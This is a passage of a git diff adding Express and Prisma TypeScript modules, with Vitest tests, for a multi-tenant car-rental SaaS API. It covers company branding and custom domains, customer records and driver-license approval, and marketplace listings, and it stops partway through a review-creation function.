b/apps/api/src/modules/companies/company.service.ts new file mode 100644 index 0000000..f2adf6b --- /dev/null +++ b/apps/api/src/modules/companies/company.service.ts @@ -0,0 +1,153 @@ +import { uploadImage } from '../../lib/storage' +import { ConflictError, NotFoundError } from '../../http/errors' +import { presentCompany, presentBrand } from './company.presenter' +import * as repo from './company.repo' + +function buildPaymentMethodsEnabled(input: { + amanpayMerchantId?: string | null + amanpaySecretKey?: string | null + paypalEmail?: string | null +}) { + const methods: Array<'AMANPAY' | 'PAYPAL'> = [] + if (input.amanpayMerchantId && input.amanpaySecretKey) methods.push('AMANPAY') + if (input.paypalEmail) methods.push('PAYPAL') + return methods +} + +export async function getCompany(companyId: string) { + return presentCompany(await repo.findCompany(companyId)) +} + +export async function updateCompany(companyId: string, data: any) { + return presentCompany(await repo.updateCompany(companyId, data)) +} + +export async function getBrand(companyId: string) { + return presentBrand(await repo.findBrand(companyId)) +} + +export async function updateBrand(companyId: string, body: any, companyName: string, companySlug: string) { + const current = await repo.findBrand(companyId) + const paymentMethodsEnabled = buildPaymentMethodsEnabled({ + amanpayMerchantId: body.amanpayMerchantId ?? current?.amanpayMerchantId, + amanpaySecretKey: body.amanpaySecretKey ?? current?.amanpaySecretKey, + paypalEmail: body.paypalEmail ?? current?.paypalEmail, + }) + return presentBrand(await repo.upsertBrand( + companyId, + { ...body, paymentMethodsEnabled }, + { displayName: body.displayName ?? companyName, subdomain: companySlug, paymentMethodsEnabled, ...body }, + )) +} + +export async function uploadLogo(companyId: string, companyName: string, companySlug: string, file: Buffer) { + const url = await uploadImage(file, `companies/${companyId}/brand`, 'logo') + return presentBrand(await repo.upsertBrand( + companyId, + { logoUrl: url }, + { displayName: companyName, subdomain: companySlug, logoUrl: url }, + )) +} + +export async function uploadHeroImage(companyId: string, companyName: string, companySlug: string, file: Buffer) { + const url = await uploadImage(file, `companies/${companyId}/brand`, 'hero') + return presentBrand(await repo.upsertBrand( + companyId, + { heroImageUrl: url }, + { displayName: companyName, subdomain: companySlug, heroImageUrl: url }, + )) +} + +export async function checkSubdomainAvailability(subdomain: string, companyId: string) { + const existing = await repo.findBrandBySubdomain(subdomain, companyId) + return { available: !existing } +} + +export async function setCustomDomain(companyId: string, companyName: string, companySlug: string, customDomain: string) { + const normalized = customDomain.toLowerCase().trim() + const existing = await repo.findBrandByCustomDomain(normalized, companyId) + if (existing) throw new ConflictError('This custom domain is already in use') + return repo.upsertBrand( + companyId, + { customDomain: normalized, customDomainVerified: false, customDomainAddedAt: new Date() }, + { displayName: companyName, subdomain: companySlug, customDomain: normalized, customDomainVerified: false, customDomainAddedAt: new Date() }, + ) +} + +export async function getCustomDomainStatus(companyId: string) { + const brand = await repo.findBrand(companyId) + const customDomain = brand?.customDomain ?? null + return { + customDomain, + verified: brand?.customDomainVerified ?? false, + status: customDomain ? (brand?.customDomainVerified ? 'verified' : 'pending_dns') : 'not_configured', + dnsTarget: process.env.NEXT_PUBLIC_CUSTOM_DOMAIN_TARGET ?? 'cname.vercel-dns.com', + } +} + +export async function removeCustomDomain(companyId: string) { + const result = await repo.clearCustomDomain(companyId) + return { success: result.count > 0 } +} + +export async function getContractSettings(companyId: string) { + return repo.findContractSettings(companyId) +} + +export async function updateContractSettings(companyId: string, data: any) { + return repo.upsertContractSettings(companyId, data) +} + +export async function getInsurancePolicies(companyId: string) { + return repo.findInsurancePolicies(companyId) +} + +export async function createInsurancePolicy(companyId: string, data: any) { + return repo.createInsurancePolicy(companyId, data) +} + +export async function updateInsurancePolicy(id: string, companyId: string, data: any) { + const result = await repo.updateInsurancePolicy(id, companyId, data) + if (result.count === 0) throw new NotFoundError('Insurance policy not found') + return repo.findInsurancePolicyOrThrow(id) +} + +export async function deleteInsurancePolicy(id: string, companyId: string) { + const result = await repo.deleteInsurancePolicy(id, companyId) + if (result.count === 0) throw new NotFoundError('Insurance policy not found') +} + +export async function getPricingRules(companyId: string) { + return repo.findPricingRules(companyId) +} + +export async function createPricingRule(companyId: string, data: any) { + return repo.createPricingRule(companyId, data) +} + +export async function updatePricingRule(id: string, companyId: string, data: any) { + const result = await repo.updatePricingRule(id, companyId, data) + if (result.count === 0) throw new NotFoundError('Pricing rule not found') + return repo.findPricingRuleOrThrow(id) +} + +export async function deletePricingRule(id: string, companyId: string) { + const result = await repo.deletePricingRule(id, companyId) + if (result.count === 0) throw new NotFoundError('Pricing rule not found') +} + +export async function getAccountingSettings(companyId: string) { + return repo.findAccountingSettings(companyId) +} + +export async function updateAccountingSettings(companyId: string, data: any) { + return repo.upsertAccountingSettings(companyId, data) +} + +export async function getApiKey(companyId: string) { + return repo.findApiKey(companyId) +} + +export async function regenerateApiKey(companyId: string) { + return repo.regenerateApiKey(companyId) +} diff --git a/apps/api/src/modules/companies/company.test.ts b/apps/api/src/modules/companies/company.test.ts new file mode 100644 index 0000000..82be24a --- /dev/null +++ b/apps/api/src/modules/companies/company.test.ts @@ -0,0 +1,125 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest' +import * as repo from './company.repo' +import * as service from './company.service' + +vi.mock('./company.repo') +vi.mock('../../lib/storage', () => ({ + uploadImage: vi.fn().mockResolvedValue('http://localhost:4000/storage/companies/comp_1/brand/logo.jpg'), +})) + +const mockCompany = { + id: 'comp_1', + name: 'Test Rentals', + slug: 'test-rentals', + email: 'info@test.com', + brand: null, + subscription: null, + _count: { vehicles: 5, customers: 10, reservations: 20 }, +} + +const mockBrand = { + id: 'brand_1', + companyId: 'comp_1', + displayName: 'Test Rentals', + subdomain: 'test-rentals', + logoUrl: null, + heroImageUrl: null, + customDomain: null, + customDomainVerified: false, + amanpayMerchantId: null, + amanpaySecretKey: null, + paypalEmail: null, +} + +beforeEach(() => { + vi.clearAllMocks() +}) + +describe('company.service', () => { + describe('getCompany', () => { + it('returns company with brand and subscription', async () => { + vi.mocked(repo.findCompany).mockResolvedValue(mockCompany as any) + const result = await service.getCompany('comp_1') + expect(result).toEqual(mockCompany) + expect(repo.findCompany).toHaveBeenCalledWith('comp_1') + }) + }) + + describe('updateCompany', () => { + it('updates company profile', async () => { + vi.mocked(repo.updateCompany).mockResolvedValue({ ...mockCompany, name: 'Updated Rentals' } as any) + const result = await service.updateCompany('comp_1', { name: 'Updated Rentals' }) + expect(repo.updateCompany).toHaveBeenCalledWith('comp_1', { name: 'Updated Rentals' }) + }) + }) + + describe('uploadLogo', () => { + it('uploads logo and upserts brand', async () => { + vi.mocked(repo.upsertBrand).mockResolvedValue({ ...mockBrand, logoUrl: 'http://localhost:4000/storage/companies/comp_1/brand/logo.jpg' } as any) + const result = await service.uploadLogo('comp_1', 'Test Rentals', 'test-rentals', Buffer.from('')) + expect(repo.upsertBrand).toHaveBeenCalledWith( + 'comp_1', + expect.objectContaining({ logoUrl: 'http://localhost:4000/storage/companies/comp_1/brand/logo.jpg' }), + expect.objectContaining({ logoUrl: 'http://localhost:4000/storage/companies/comp_1/brand/logo.jpg' }), + ) + }) + }) + + describe('uploadHeroImage', () => { + it('uploads hero image and upserts brand', async () => { + vi.mocked(repo.upsertBrand).mockResolvedValue({ ...mockBrand, heroImageUrl: 'http://localhost:4000/storage/companies/comp_1/brand/logo.jpg' } as any) + await service.uploadHeroImage('comp_1', 'Test Rentals', 'test-rentals', Buffer.from('')) + expect(repo.upsertBrand).toHaveBeenCalledWith( + 'comp_1', + expect.objectContaining({ heroImageUrl: expect.any(String) }), + expect.objectContaining({ heroImageUrl: expect.any(String) }), + ) + }) + }) + + describe('checkSubdomainAvailability', () => { + it('returns available=true when subdomain is free', async () => { + vi.mocked(repo.findBrandBySubdomain).mockResolvedValue(null) + const result = await service.checkSubdomainAvailability('my-rental', 'comp_1') + expect(result.available).toBe(true) + }) + + it('returns available=false when subdomain is taken', async () => { + vi.mocked(repo.findBrandBySubdomain).mockResolvedValue(mockBrand as any) + const result = await service.checkSubdomainAvailability('taken-rental', 'comp_1') + expect(result.available).toBe(false) + }) + }) + + describe('setCustomDomain', () => { + it('throws ConflictError when custom domain is already in use', async () => { + vi.mocked(repo.findBrandByCustomDomain).mockResolvedValue(mockBrand as any) + await expect(service.setCustomDomain('comp_1', 'Test Rentals', 'test-rentals', 'taken.com')).rejects.toThrow('This custom domain is already in use') + }) + + it('sets custom domain when available', async () => { + vi.mocked(repo.findBrandByCustomDomain).mockResolvedValue(null) + vi.mocked(repo.upsertBrand).mockResolvedValue({ ...mockBrand, customDomain: 'my-rental.com' } as any) + await service.setCustomDomain('comp_1', 'Test Rentals', 'test-rentals', 'My-Rental.com') + expect(repo.upsertBrand).toHaveBeenCalledWith( + 'comp_1', + expect.objectContaining({ customDomain: 'my-rental.com' }), + expect.objectContaining({ customDomain: 'my-rental.com' }), + ) + }) + }) + + describe('updateInsurancePolicy', () => { + it('throws NotFoundError when policy does not belong to company', async () => { + vi.mocked(repo.updateInsurancePolicy).mockResolvedValue({ count: 0 } as any) + await expect(service.updateInsurancePolicy('pol_1', 'comp_1', { name: 'CDW' })).rejects.toThrow('Insurance policy not found') + }) + }) + + describe('deletePricingRule', () => { + it('throws NotFoundError when rule does not belong to company', async () => { + vi.mocked(repo.deletePricingRule).mockResolvedValue({ count: 0 } as any) + await expect(service.deletePricingRule('rule_1', 'comp_1')).rejects.toThrow('Pricing rule not found') + }) + }) +}) diff --git a/apps/api/src/modules/customers/customer.presenter.ts b/apps/api/src/modules/customers/customer.presenter.ts new file mode 100644 index 0000000..6463441 --- /dev/null +++ b/apps/api/src/modules/customers/customer.presenter.ts @@ -0,0 +1,14 @@ +import { getProtectedCustomerLicenseImageUrl } from '../../lib/storage' + +export function presentCustomer(customer: any) { + return { + ...customer, + licenseImageUrl: customer?.licenseImageUrl + ? getProtectedCustomerLicenseImageUrl(customer.id) + : null, + } +} + +export function presentCustomerList(customers: any[], meta: { total: number; page: number; pageSize: number; totalPages: number }) { + return { data: customers, ...meta } +} diff --git a/apps/api/src/modules/customers/customer.repo.ts b/apps/api/src/modules/customers/customer.repo.ts new file mode 100644 index 0000000..a90bd6a --- /dev/null +++ b/apps/api/src/modules/customers/customer.repo.ts @@ -0,0 +1,37 @@ +import { prisma } from '../../lib/prisma' + +export async function findMany(where: any, skip: number, take: number) { + return Promise.all([ + prisma.customer.findMany({ where, skip, take, orderBy: { createdAt: 'desc' } }), + prisma.customer.count({ where }), + ]) +} + +export async function findById(id: string, companyId: string) { + return prisma.customer.findFirst({ + where: { id, companyId }, + include: { + reservations: { include: { vehicle: true }, orderBy: { createdAt: 'desc' }, take: 20 }, + }, + }) +} + +export async function findByIdSimple(id: string, companyId: string) { + return prisma.customer.findFirst({ where: { id, companyId } }) +} + +export async function create(data: any) { + return prisma.customer.create({ data }) +} + +export async function updateMany(id: string, companyId: string, data: any) { + return prisma.customer.updateMany({ where: { id, companyId }, data }) +} + +export async function updateById(id: string, data: any) { + return prisma.customer.update({ where: { id }, data }) +} + +export async function findUniqueOrThrow(id: string) { + return prisma.customer.findUniqueOrThrow({ where: { id } }) +} diff --git a/apps/api/src/modules/customers/customer.routes.ts b/apps/api/src/modules/customers/customer.routes.ts new file mode 100644 index 0000000..4a32752 --- /dev/null +++ b/apps/api/src/modules/customers/customer.routes.ts @@ -0,0 +1,100 @@ +import { Router } from 'express' +import { requireCompanyAuth, requireCompanyDocumentAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRole } from '../../middleware/requireRole' +import { parseBody, parseQuery, parseParams } from '../../http/validate' +import { ok, created } from '../../http/respond' +import { imageUpload, assertImageFile } from '../../http/upload' +import * as service from './customer.service' +import { customerSchema, listQuerySchema, approveLicenseSchema, flagSchema, idParamSchema } from './customer.schemas' + +const router = Router() + +router.get('/:id/license-image', requireCompanyDocumentAuth, requireTenant, requireSubscription, async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const filePath = await service.getLicenseImageFile(id, req.companyId) + res.sendFile(filePath) + } catch (err) { next(err) } +}) + +router.use(requireCompanyAuth, requireTenant, requireSubscription) +router.get('/', async (req, res, next) => { + try { + const query = parseQuery(listQuerySchema, req) + const result = await service.listCustomers(req.companyId, query) + res.json(result) + } catch (err) { next(err) } +}) + +router.post('/', async (req, res, next) => { + try { + const body = parseBody(customerSchema, req) + const customer = await service.createCustomer(body, req.companyId) + created(res, customer) + } catch (err) { next(err) } +}) + +router.get('/:id', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const customer = await service.getCustomer(id, req.companyId) + ok(res, customer) + } catch (err) { next(err) } +}) + +router.patch('/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const body = parseBody(customerSchema.partial(), req) + const customer = await service.updateCustomer(id, req.companyId, body) + ok(res, customer) + } catch (err) { next(err) } +}) + +router.post('/:id/flag', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { reason } = parseBody(flagSchema, req) + await service.flagCustomer(id, req.companyId, reason) + ok(res, { success: true }) + } catch (err) { next(err) } +}) + +router.delete('/:id/flag', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.unflagCustomer(id, req.companyId) + ok(res, { success: true }) + } catch (err) { next(err) } +}) + +router.post('/:id/validate-license', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const result = await service.validateCustomerLicense(id, req.companyId) + ok(res, result) + } catch (err) { next(err) } +}) + +router.post('/:id/license-image', imageUpload.single('file'), async (req, res, next) => { + try { + assertImageFile(req.file, 'license image') + const { id } = parseParams(idParamSchema, req) + const updated = await service.uploadLicenseImage(id, req.companyId, req.file) + ok(res, updated) + } catch (err) { next(err) } +}) + +router.post('/:id/approve-license', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { decision, note } = parseBody(approveLicenseSchema, req) + const approverName = `${req.employee.firstName} ${req.employee.lastName}` + const updated = await service.approveLicense(id, req.companyId, decision, note, approverName) + ok(res, updated) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/customers/customer.schemas.ts b/apps/api/src/modules/customers/customer.schemas.ts new file mode 100644 index 0000000..ea2f9c6 --- /dev/null +++ b/apps/api/src/modules/customers/customer.schemas.ts @@ -0,0 +1,39 @@ +import { z } from 'zod' + +export const paginationSchema = z.object({ + page: z.coerce.number().int().min(1).max(10000).default(1), + pageSize: z.coerce.number().int().min(1).max(100).default(20), +}) + +export const customerSchema = z.object({ + firstName: z.string().min(1).max(100).trim(), + lastName: z.string().min(1).max(100).trim(), + email: z.string().email().max(255).trim().toLowerCase(), + phone: z.string().max(30).trim().optional(), + driverLicense: z.string().max(50).trim().optional(), + dateOfBirth: z.string().datetime().optional(), + nationality: z.string().max(100).trim().optional(), + address: z.record(z.unknown()).optional(), + notes: z.string().max(2000).trim().optional(), + licenseExpiry: z.string().datetime().optional(), + licenseIssuedAt: z.string().datetime().optional(), + licenseCountry: z.string().max(100).trim().optional(), + licenseNumber: z.string().max(50).trim().optional(), + licenseCategory: z.string().max(20).trim().optional(), +}) + +export const listQuerySchema = paginationSchema.extend({ + q: z.string().max(100).optional(), + flagged: z.enum(['true', 'false']).optional(), +}) + +export const approveLicenseSchema = z.object({ + decision: z.enum(['APPROVE', 'DENY']), + note: z.string().optional(), +}) + +export const flagSchema = z.object({ + reason: z.string().optional(), +}) + +export const idParamSchema = z.object({ id: z.string() }) diff --git a/apps/api/src/modules/customers/customer.service.ts b/apps/api/src/modules/customers/customer.service.ts new file mode 100644 index 0000000..6f89584 --- /dev/null +++ b/apps/api/src/modules/customers/customer.service.ts @@ -0,0 +1,100 @@ +import { validateAndFlagLicense } from '../../services/licenseValidationService' +import { uploadImage, deleteImage, resolveStoredFilePath } from '../../lib/storage' +import { NotFoundError } from '../../http/errors' +import { presentCustomer, presentCustomerList } from './customer.presenter' +import * as repo from './customer.repo' + +export async function listCustomers(companyId: string, query: { page?: number; pageSize?: number; q?: string; flagged?: string }) { + const page = query.page ?? 1 + const pageSize = query.pageSize ?? 20 + const { q, flagged } = query + const safeQ = q ? q.trim().slice(0, 100) : undefined + const where: any = { companyId } + if (flagged !== undefined) where.flagged = flagged === 'true' + if (safeQ) { + where.OR = [ + { firstName: { contains: safeQ, mode: 'insensitive' } }, + { lastName: { contains: safeQ, mode: 'insensitive' } }, + { email: { contains: safeQ, mode: 'insensitive' } }, + ] + } + const [customers, total] = await repo.findMany(where, (page - 1) * pageSize, pageSize) + return presentCustomerList(customers.map(presentCustomer), { total, page, pageSize, totalPages: Math.ceil(total / pageSize) }) +} + +export async function getCustomer(id: string, companyId: string) { + const customer = await repo.findById(id, companyId) + if (!customer) throw new NotFoundError('Customer not found') + return presentCustomer(customer) +} + +export async function createCustomer(data: any, companyId: string) { + const customer = await repo.create({ + ...data, + companyId, + dateOfBirth: data.dateOfBirth ? new Date(data.dateOfBirth) : null, + licenseExpiry: data.licenseExpiry ? new Date(data.licenseExpiry) : null, + licenseIssuedAt: data.licenseIssuedAt ? new Date(data.licenseIssuedAt) : null, + }) + if (data.licenseExpiry) { + await validateAndFlagLicense(customer.id).catch(() => null) + } + return presentCustomer(customer) +} + +export async function updateCustomer(id: string, companyId: string, data: any) { + const result = await repo.updateMany(id, companyId, { + ...data, + dateOfBirth: data.dateOfBirth ? new Date(data.dateOfBirth) : undefined, + licenseExpiry: data.licenseExpiry ? new Date(data.licenseExpiry) : undefined, + licenseIssuedAt: data.licenseIssuedAt ? new Date(data.licenseIssuedAt) : undefined, + }) + if (result.count === 0) throw new NotFoundError('Customer not found') + if (data.licenseExpiry) await validateAndFlagLicense(id).catch(() => null) + return presentCustomer(await repo.findUniqueOrThrow(id)) +} + +export async function flagCustomer(id: string, companyId: string, reason?: string) { + await repo.updateMany(id, companyId, { flagged: true, flagReason: reason ?? null }) +} + +export async function unflagCustomer(id: string, companyId: string) { + await repo.updateMany(id, companyId, { flagged: false, flagReason: null }) +} + +export async function validateCustomerLicense(id: string, companyId: string) { + const customer = await repo.findByIdSimple(id, companyId) + if (!customer) throw new NotFoundError('Customer not found') + return validateAndFlagLicense(customer.id) +} + +export async function uploadLicenseImage(id: string, companyId: string, file: Express.Multer.File) { + const customer = await repo.findByIdSimple(id, companyId) + if (!customer) throw new NotFoundError('Customer not found') + const url = await uploadImage(file.buffer, `companies/${companyId}/customers/${customer.id}`) + if (customer.licenseImageUrl) { + await deleteImage(customer.licenseImageUrl).catch(() => null) + } + return presentCustomer(await repo.updateById(customer.id, { licenseImageUrl: url })) +} + +export async function getLicenseImageFile(id: string, companyId: string) { + const customer = await repo.findByIdSimple(id, companyId) + if (!customer || !customer.licenseImageUrl) throw new NotFoundError('License image not found') + + const filePath = resolveStoredFilePath(customer.licenseImageUrl) + if (!filePath) throw new NotFoundError('License image not found') + + return filePath +} + +export async function approveLicense(id: string, companyId: string, decision: 'APPROVE' | 'DENY', note: string | undefined, approverName: string) { + const customer = await repo.findByIdSimple(id, companyId) + if (!customer) throw new NotFoundError('Customer not found') + return presentCustomer(await repo.updateById(customer.id, { + licenseValidationStatus: decision === 'APPROVE' ? 'APPROVED' : 'DENIED', + licenseApprovedBy: approverName, + licenseApprovedAt: new Date(), + licenseApprovalNote: note ?? null, + })) +} diff --git a/apps/api/src/modules/customers/customer.test.ts b/apps/api/src/modules/customers/customer.test.ts new file mode 100644 index 0000000..fddcdd0 --- /dev/null +++ b/apps/api/src/modules/customers/customer.test.ts @@ -0,0 +1,134 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest' +import * as repo from './customer.repo' +import * as service from './customer.service' + +vi.mock('./customer.repo') +vi.mock('../../services/licenseValidationService', () => ({ + validateAndFlagLicense: vi.fn().mockResolvedValue({ status: 'VALID', daysUntilExpiry: 365, requiresApproval: false, message: 'Valid' }), +})) +vi.mock('../../lib/storage', () => ({ + uploadImage: vi.fn().mockResolvedValue('http://localhost:4000/storage/test.jpg'), + deleteImage: vi.fn().mockResolvedValue(undefined), + resolveStoredFilePath: vi.fn().mockReturnValue('/tmp/license.jpg'), + getProtectedCustomerLicenseImageUrl: vi.fn((customerId: string) => `http://localhost:3001/dashboard/api/v1/customers/${customerId}/license-image`), +})) + +const mockCustomer = { + id: 'cust_1', + companyId: 'comp_1', + firstName: 'John', + lastName: 'Doe', + email: 'john@example.com', + licenseImageUrl: null, + flagged: false, + flagReason: null, + licenseExpiry: null, +} + +beforeEach(() => { + vi.clearAllMocks() +}) + +describe('customer.service', () => { + describe('listCustomers', () => { + it('returns paginated customer list', async () => { + vi.mocked(repo.findMany).mockResolvedValue([[mockCustomer], 1] as any) + const result = await service.listCustomers('comp_1', { page: 1, pageSize: 20 }) + expect(result.total).toBe(1) + expect(result.data).toHaveLength(1) + expect(result.totalPages).toBe(1) + }) + + it('filters by search query', async () => { + vi.mocked(repo.findMany).mockResolvedValue([[], 0] as any) + await service.listCustomers('comp_1', { page: 1, pageSize: 20, q: 'john' }) + expect(repo.findMany).toHaveBeenCalledWith( + expect.objectContaining({ OR: expect.arrayContaining([expect.objectContaining({ firstName: expect.anything() })]) }), + 0, 20, + ) + }) + + it('filters by flagged status', async () => { + vi.mocked(repo.findMany).mockResolvedValue([[], 0] as any) + await service.listCustomers('comp_1', { page: 1, pageSize: 20, flagged: 'true' }) + expect(repo.findMany).toHaveBeenCalledWith( + expect.objectContaining({ flagged: true }), + 0, 20, + ) + }) + }) + + describe('createCustomer', () => { + it('creates customer and returns it', async () => { + vi.mocked(repo.create).mockResolvedValue(mockCustomer as any) + const result = await service.createCustomer({ firstName: 'John', lastName: 'Doe', email: 'john@example.com' }, 'comp_1') + expect(result).toEqual({ + ...mockCustomer, + licenseImageUrl: null, + }) + expect(repo.create).toHaveBeenCalledWith(expect.objectContaining({ companyId: 'comp_1' })) + }) + }) + + describe('updateCustomer', () => { + it('throws NotFoundError when customer does not belong to company', async () => { + vi.mocked(repo.updateMany).mockResolvedValue({ count: 0 } as any) + await expect(service.updateCustomer('cust_1', 'comp_1', { firstName: 'Jane' })).rejects.toThrow('Customer not found') + }) + + it('updates customer and returns refreshed record', async () => { + vi.mocked(repo.updateMany).mockResolvedValue({ count: 1 } as any) + vi.mocked(repo.findUniqueOrThrow).mockResolvedValue({ ...mockCustomer, firstName: 'Jane' } as any) + const result = await service.updateCustomer('cust_1', 'comp_1', { firstName: 'Jane' }) + expect(result.firstName).toBe('Jane') + expect(result.licenseImageUrl).toBeNull() + }) + }) + + describe('flagCustomer', () => { + it('sets flagged=true with reason', async () => { + vi.mocked(repo.updateMany).mockResolvedValue({ count: 1 } as any) + await service.flagCustomer('cust_1', 'comp_1', 'Suspicious behavior') + expect(repo.updateMany).toHaveBeenCalledWith('cust_1', 'comp_1', { flagged: true, flagReason: 'Suspicious behavior' }) + }) + }) + + describe('unflagCustomer', () => { + it('clears flag and reason', async () => { + vi.mocked(repo.updateMany).mockResolvedValue({ count: 1 } as any) + await service.unflagCustomer('cust_1', 'comp_1') + expect(repo.updateMany).toHaveBeenCalledWith('cust_1', 'comp_1', { flagged: false, flagReason: null }) + }) + }) + + describe('uploadLicenseImage', () => { + it('uploads image and updates customer record', async () => { + vi.mocked(repo.findByIdSimple).mockResolvedValue(mockCustomer as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...mockCustomer, licenseImageUrl: 'http://localhost:4000/storage/test.jpg' } as any) + const result = await service.uploadLicenseImage('cust_1', 'comp_1', { buffer: Buffer.from(''), mimetype: 'image/jpeg' } as any) + expect(result.licenseImageUrl).toBe('http://localhost:3001/dashboard/api/v1/customers/cust_1/license-image') + }) + + it('resolves a stored file path for protected downloads', async () => { + vi.mocked(repo.findByIdSimple).mockResolvedValue({ ...mockCustomer, licenseImageUrl: 'http://localhost:4000/storage/test.jpg' } as any) + const result = await service.getLicenseImageFile('cust_1', 'comp_1') + expect(result).toBe('/tmp/license.jpg') + }) + }) + + describe('approveLicense', () => { + it('sets APPROVED status', async () => { + vi.mocked(repo.findByIdSimple).mockResolvedValue(mockCustomer as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...mockCustomer, licenseValidationStatus: 'APPROVED' } as any) + const result = await service.approveLicense('cust_1', 'comp_1', 'APPROVE', undefined, 'Admin User') + expect(repo.updateById).toHaveBeenCalledWith('cust_1', expect.objectContaining({ licenseValidationStatus: 'APPROVED' })) + }) + + it('sets DENIED status', async () => { + vi.mocked(repo.findByIdSimple).mockResolvedValue(mockCustomer as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...mockCustomer, licenseValidationStatus: 'DENIED' } as any) + await service.approveLicense('cust_1', 'comp_1', 'DENY', 'Expired document', 'Admin User') + expect(repo.updateById).toHaveBeenCalledWith('cust_1', expect.objectContaining({ licenseValidationStatus: 'DENIED' })) + }) + }) +}) diff --git a/apps/api/src/modules/marketplace/marketplace.presenter.ts b/apps/api/src/modules/marketplace/marketplace.presenter.ts new file mode 100644 index 0000000..b62d992 --- /dev/null +++ b/apps/api/src/modules/marketplace/marketplace.presenter.ts @@ -0,0 +1,11 @@ +export function presentVehicleWithAvailability( + vehicle: T, + availability: { available: boolean; status: string; nextAvailableAt: Date | null }, +) { + return { + ...vehicle, + availability: availability.available, + availabilityStatus: availability.status, + nextAvailableAt: availability.nextAvailableAt, + } +} diff --git a/apps/api/src/modules/marketplace/marketplace.repo.ts b/apps/api/src/modules/marketplace/marketplace.repo.ts new file mode 100644 index 0000000..30d10c8 --- /dev/null +++ b/apps/api/src/modules/marketplace/marketplace.repo.ts @@ -0,0 +1,153 @@ +import { prisma } from '../../lib/prisma' + +export async function findPublicOffers() { + return prisma.offer.findMany({ + where: { isPublic: true, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, + include: { company: { include: { brand: { select: { displayName: true, logoUrl: true, subdomain: true, primaryColor: true } } } } }, + orderBy: [{ isFeatured: 'desc' }, { createdAt: 'desc' }], + take: 50, + }) +} + +export async function findCitiesFromCompanies() { + return prisma.company.findMany({ + where: { + status: { in: ['ACTIVE', 'TRIALING'] }, + brand: { isListedOnMarketplace: true, publicCity: { not: null } }, + }, + select: { brand: { select: { publicCity: true } } }, + }) +} + +export async function findListedCompanies(where: any, skip: number, take: number) { + return prisma.company.findMany({ + where, + include: { + brand: { select: { displayName: true, logoUrl: true, subdomain: true, publicCity: true, publicCountry: true, marketplaceRating: true, primaryColor: true } }, + _count: { select: { vehicles: { where: { isPublished: true, status: 'AVAILABLE' } } } }, + }, + skip, + take, + }) +} + +export async function findPublishedVehicles(where: any, skip: number, take: number) { + return prisma.vehicle.findMany({ + where, + include: { + company: { include: { brand: { select: { displayName: true, logoUrl: true, subdomain: true, marketplaceRating: true, primaryColor: true } } } }, + }, + skip, + take, + orderBy: { dailyRate: 'asc' }, + }) +} + +export async function findVehicleForMarketplace(vehicleId: string, companySlug: string) { + return prisma.vehicle.findFirst({ + where: { id: vehicleId, isPublished: true, company: { slug: companySlug, status: { in: ['ACTIVE', 'TRIALING'] } } }, + include: { company: { include: { brand: true } } }, + }) +} + +export async function upsertMarketplaceCustomer(companyId: string, data: { + email: string; firstName: string; lastName: string; phone?: string +}) { + return prisma.customer.upsert({ + where: { companyId_email: { companyId, email: data.email } }, + create: { companyId, firstName: data.firstName, lastName: data.lastName, email: data.email, phone: data.phone }, + update: { firstName: data.firstName, lastName: data.lastName, ...(data.phone ? { phone: data.phone } : {}) }, + }) +} + +export async function createMarketplaceReservation(data: { + companyId: string; vehicleId: string; customerId: string + startDate: Date; endDate: Date; dailyRate: number; totalDays: number; totalAmount: number; notes?: string +}) { + return prisma.reservation.create({ + data: { ...data, source: 'MARKETPLACE', status: 'DRAFT' }, + }) +} + +export async function findCompanyPage(slug: string) { + return prisma.company.findFirst({ + where: { slug, status: { in: ['ACTIVE', 'TRIALING'] } }, + include: { + brand: true, + vehicles: { where: { isPublished: true, status: 'AVAILABLE' }, orderBy: { createdAt: 'desc' } }, + offers: { where: { isPublic: true, isActive: true, validUntil: { gte: new Date() } }, orderBy: { isFeatured: 'desc' } }, + }, + }) +} + +export async function findCompanyBySlug(slug: string) { + return prisma.company.findFirstOrThrow({ where: { slug, status: { in: ['ACTIVE', 'TRIALING'] } } }) +} + +export async function findCompanyReviews(companyId: string) { + return prisma.review.findMany({ + where: { companyId, isPublished: true }, + include: { renter: { select: { firstName: true, lastName: true } } }, + orderBy: { createdAt: 'desc' }, + take: 50, + }) +} + +export async function findCompanyVehicles(companyId: string) { + return prisma.vehicle.findMany({ + where: { companyId, isPublished: true, status: 'AVAILABLE' }, + orderBy: { createdAt: 'desc' }, + }) +} + +export async function findVehicleById(slug: string, vehicleId: string) { + const company = await prisma.company.findFirstOrThrow({ where: { slug, status: { in: ['ACTIVE', 'TRIALING'] } } }) + return prisma.vehicle.findFirstOrThrow({ + where: { id: vehicleId, companyId: company.id, isPublished: true, status: 'AVAILABLE' }, + include: { company: { include: { brand: true } } }, + }) +} + +export async function findCompanyOffers(companyId: string) { + return prisma.offer.findMany({ + where: { companyId, isPublic: true, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, + orderBy: [{ isFeatured: 'desc' }, { createdAt: 'desc' }], + }) +} + +export async function findReservationByReviewToken(token: string) { + return prisma.reservation.findUnique({ + where: { reviewToken: token }, + include: { + vehicle: { select: { make: true, model: true, year: true, photos: true } }, + company: { include: { brand: { select: { displayName: true, logoUrl: true } } } }, + review: { select: { id: true } }, + }, + }) +} + +export async function findReservationForReviewSubmit(token: string) { + return prisma.reservation.findUnique({ + where: { reviewToken: token }, + include: { review: { select: { id: true } } }, + }) +} + +export async function createReview(data: { + reservationId: string; companyId: string; renterId?: string | null + overallRating: number; vehicleRating?: number; serviceRating?: number; comment?: string +}) { 